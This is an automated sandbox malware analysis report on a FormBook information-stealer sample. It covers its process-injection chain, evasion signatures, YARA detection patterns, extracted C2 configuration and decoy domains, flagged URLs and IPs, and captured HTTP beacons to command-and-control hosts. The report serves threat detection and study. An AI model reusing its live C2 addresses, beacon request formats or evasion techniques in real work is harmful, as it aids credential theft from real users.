Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YSpCB8DEek.exe

Overview

General Information

Sample Name:YSpCB8DEek.exe
Original Sample Name:d927de8cecb8523b956d2bb2098d20ef.exe
Analysis ID:825979
MD5:d927de8cecb8523b956d2bb2098d20ef
SHA1:cb01b1c8bea968c8919c7303d10ec5b4c520691c
SHA256:e2f96798a7d58ac8a06c39d4459336c8fddafec67fe12cda3c9d4e497702601f
Tags:32exetrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • YSpCB8DEek.exe (PID: 5880 cmdline: C:\Users\user\Desktop\YSpCB8DEek.exe MD5: D927DE8CECB8523B956D2BB2098D20EF)
    • afhjjq.exe (PID: 4088 cmdline: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq MD5: 6C148CA1A207DD5BE97C1726A9F4BABF)
      • afhjjq.exe (PID: 2236 cmdline: C:\Users\user\AppData\Local\Temp\afhjjq.exe MD5: 6C148CA1A207DD5BE97C1726A9F4BABF)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • control.exe (PID: 4980 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
            • cmd.exe (PID: 5280 cmdline: /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.n7m.tokyo/nes8/"], "decoy": ["simantsfamily.com", "ninobrowndelivery.net", "y94x.info", "huibi01.vip", "davidspanu.com", "swegon.tech", "moapulsa.com", "coveredseguros.com", "owltoon.site", "loyalguardianop.com", "banca-particulares.icu", "innovativanimal.com", "girlschools.top", "smartbed-gb-tok.life", "vhail.store", "bluffdalecitizens.info", "asmcpn.us", "wordybag.online", "smmfsa.com", "jinglunqhd.com", "mybestfurend.com", "hatmam.com", "kruz56.site", "drinkarakay.com", "linnus.shop", "shockgods.net", "adammushrooms.com", "enakslot.net", "tt0738.com", "vivre-lyon7.com", "oticascarol.live", "precisionradiologyin.com", "prvtg.top", "naturetechvr.com", "thegoodfunguy.com", "soulcommunication.site", "hallmarklog.live", "cantonbourbonroom.com", "mitsubishixpander.com", "dgrjzz1688.com", "rainbow-bridge.xyz", "yaxin376.com", "sonrisasica.com", "letterkennytown.com", "kkkrobesforwhitesonly.com", "mikamiyua.xyz", "navigatoral.ltd", "dailyhoroscope4you.space", "dietoll-official.site", "hadafsazan.net", "mommysleepswithers.com", "abc-notation.com", "tbsc766.store", "marketproinv.info", "culdshn.pics", "oxylabs.top", "incentiveexcellence.com", "sarodret.buzz", "weplaycrypto.net", "purityrecruitment.com", "s95wh.icu", "voip-59118.com", "righttowrescue.com", "feffco.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.afhjjq.exe.12f0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        1.2.afhjjq.exe.12f0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.afhjjq.exe.12f0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.afhjjq.exe.12f0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.afhjjq.exe.12f0000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: YSpCB8DEek.exeReversingLabs: Detection: 48%
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.hadafsazan.net/nes8/Avira URL Cloud: Label: malware
          Source: http://www.prvtg.top/nes8/www.innovativanimal.comAvira URL Cloud: Label: malware
          Source: http://www.marketproinv.info/nes8/www.prvtg.topAvira URL Cloud: Label: malware
          Source: http://www.prvtg.top/nes8/Avira URL Cloud: Label: malware
          Source: http://www.hallmarklog.live/nes8/www.n7m.tokyoAvira URL Cloud: Label: malware
          Source: http://www.marketproinv.info/nes8/Avira URL Cloud: Label: malware
          Source: http://www.yaxin376.com/nes8/Avira URL Cloud: Label: malware
          Source: http://www.naturetechvr.com/nes8/Avira URL Cloud: Label: malware
          Source: http://www.incentiveexcellence.com/nes8/www.purityrecruitment.comAvira URL Cloud: Label: malware
          Source: http://www.swegon.tech/nes8/www.linnus.shopAvira URL Cloud: Label: malware
          Source: http://www.enakslot.net/nes8/www.wordybag.onlineAvira URL Cloud: Label: malware
          Source: http://www.incentiveexcellence.com/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3Avira URL Cloud: Label: malware
          Source: http://www.linnus.shop/nes8/Avira URL Cloud: Label: malware
          Source: http://www.dietoll-official.site/nes8/Avira URL Cloud: Label: malware
          Source: http://www.wordybag.online/nes8/www.dietoll-official.siteAvira URL Cloud: Label: malware
          Source: http://www.wordybag.onlineAvira URL Cloud: Label: malware
          Source: http://www.purityrecruitment.com/nes8/Avira URL Cloud: Label: malware
          Source: http://www.yaxin376.comAvira URL Cloud: Label: malware
          Source: http://www.dietoll-official.site/nes8/www.hallmarklog.liveAvira URL Cloud: Label: malware
          Source: http://www.innovativanimal.com/nes8/Avira URL Cloud: Label: malware
          Source: http://www.jinglunqhd.com/nes8/Avira URL Cloud: Label: malware
          Source: http://www.yaxin376.com/nes8/www.enakslot.netAvira URL Cloud: Label: malware
          Source: http://www.hallmarklog.live/nes8/Avira URL Cloud: Label: malware
          Source: http://www.n7m.tokyo/nes8/Avira URL Cloud: Label: malware
          Source: http://www.innovativanimal.com/nes8/www.yaxin376.comAvira URL Cloud: Label: malware
          Source: http://www.linnus.shop/nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2GpAvira URL Cloud: Label: malware
          Source: http://www.purityrecruitment.com/nes8/www.marketproinv.infoAvira URL Cloud: Label: malware
          Source: http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6Avira URL Cloud: Label: malware
          Source: http://www.swegon.tech/nes8/Avira URL Cloud: Label: malware
          Source: http://www.linnus.shop/nes8/www.incentiveexcellence.comAvira URL Cloud: Label: malware
          Source: http://www.jinglunqhd.com/nes8/www.hadafsazan.netAvira URL Cloud: Label: malware
          Source: www.n7m.tokyo/nes8/Avira URL Cloud: Label: malware
          Source: http://www.incentiveexcellence.com/nes8/Avira URL Cloud: Label: malware
          Source: http://www.enakslot.net/nes8/Avira URL Cloud: Label: malware
          Source: http://www.n7m.tokyo/nes8/www.jinglunqhd.comAvira URL Cloud: Label: malware
          Source: http://www.hadafsazan.net/nes8/www.naturetechvr.comAvira URL Cloud: Label: malware
          Source: http://www.wordybag.online/nes8/Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeAvira: detection malicious, Label: HEUR/AGEN.1242497
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeReversingLabs: Detection: 29%
          Machine Learning detection for sample
          Source: YSpCB8DEek.exeJoe Sandbox ML: detected
          Source: 1.2.afhjjq.exe.12f0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.afhjjq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.n7m.tokyo/nes8/"], "decoy": ["simantsfamily.com", "ninobrowndelivery.net", "y94x.info", "huibi01.vip", "davidspanu.com", "swegon.tech", "moapulsa.com", "coveredseguros.com", "owltoon.site", "loyalguardianop.com", "banca-particulares.icu", "innovativanimal.com", "girlschools.top", "smartbed-gb-tok.life", "vhail.store", "bluffdalecitizens.info", "asmcpn.us", "wordybag.online", "smmfsa.com", "jinglunqhd.com", "mybestfurend.com", "hatmam.com", "kruz56.site", "drinkarakay.com", "linnus.shop", "shockgods.net", "adammushrooms.com", "enakslot.net", "tt0738.com", "vivre-lyon7.com", "oticascarol.live", "precisionradiologyin.com", "prvtg.top", "naturetechvr.com", "thegoodfunguy.com", "soulcommunication.site", "hallmarklog.live", "cantonbourbonroom.com", "mitsubishixpander.com", "dgrjzz1688.com", "rainbow-bridge.xyz", "yaxin376.com", "sonrisasica.com", "letterkennytown.com", "kkkrobesforwhitesonly.com", "mikamiyua.xyz", "navigatoral.ltd", "dailyhoroscope4you.space", "dietoll-official.site", "hadafsazan.net", "mommysleepswithers.com", "abc-notation.com", "tbsc766.store", "marketproinv.info", "culdshn.pics", "oxylabs.top", "incentiveexcellence.com", "sarodret.buzz", "weplaycrypto.net", "purityrecruitment.com", "s95wh.icu", "voip-59118.com", "righttowrescue.com", "feffco.xyz"]}
          Source: YSpCB8DEek.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: YSpCB8DEek.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: afhjjq.exe, 00000001.00000003.310805407.000000001AB80000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.316889004.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000001.00000003.312416658.000000001A9F0000.00000004.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.0000000001340000.00000040.00001000.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.317205093.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000003.318811835.000000000117B000.00000004.00000020.00020000.00000000.sdmp, afhjjq.exe, 00000002.00000002.359908889.000000000145F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.0000000004680000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.361687186.00000000044E8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 4x nop then pop esi2_2_00417284
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 4x nop then pop ebx2_2_00407B1A
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 4x nop then pop edi2_2_00417D32

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.swegon.tech
          Source: C:\Windows\explorer.exeNetwork Connect: 170.33.13.246 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.linnus.shop
          Source: C:\Windows\explorer.exeDomain query: www.incentiveexcellence.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.113.136.229 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.n7m.tokyo/nes8/
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: global trafficHTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1Host: www.swegon.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1Host: www.swegon.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp HTTP/1.1Host: www.linnus.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 HTTP/1.1Host: www.incentiveexcellence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 2.57.90.16 2.57.90.16
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 14 Mar 2023 06:26:26 GMTContent-Type: text/htmlContent-Length: 677Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 73 77 65 67 6f 6e 2e 74 65 63 68 2f 6e 65 73 38 2f 3f 77 50 3d 4b 42 33 78 73 6c 76 68 79 66 2d 34 51 32 47 70 26 61 6d 70 3b 35 6a 44 58 3d 76 72 54 58 55 7a 53 35 50 4b 4f 61 70 75 55 2f 4a 39 57 5a 39 6a 39 55 57 32 74 6c 6e 6c 2f 65 32 4e 6a 46 48 68 4b 7a 69 2b 61 6c 59 32 41 2b 71 62 71 51 41 42 39 73 2b 2b 74 51 62 53 65 37 2f 49 6a 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 6a 36 63 37 72 6d 6c 30 33 31 78 66 31 37 6d 30 6c 6e 6c 69 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 30 33 2f 31 34 20 31 34 3a 32 36 3a 32 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&amp;5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6</td></tr><tr><td>Server:</td><td>izj6c7rml031xf17m0lnliz</td></tr><tr><td>Date:</td><td>2023/03/14 14:26:26</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Mar 2023 06:26:47 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Mar 2023 12:03:40 GMTServer: Apache/1.3.19 (Unix) FrontPage/5.0.2.2510Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 34 38 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 2d 20 69 6e 63 65 6e 74 69 76 65 65 78 63 65 6c 6c 65 6e 63 65 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 33 35 2c 2a 22 3e 0a 3c 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 72 65 64 69 72 65 63 74 2e 61 61 61 71 2e 63 6f 6d 2f 68 65 61 64 65 72 2e 68 74 6d 6c 22 3e 0a 3c 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 72 65 64 69 72 65 63 74 2e 61 61 61 71 2e 63 6f 6d 2f 6c 6f 63 61 74 69 6f 6e 2e 63 67 69 3f 64 6e 3d 69 6e 63 65 6e 74 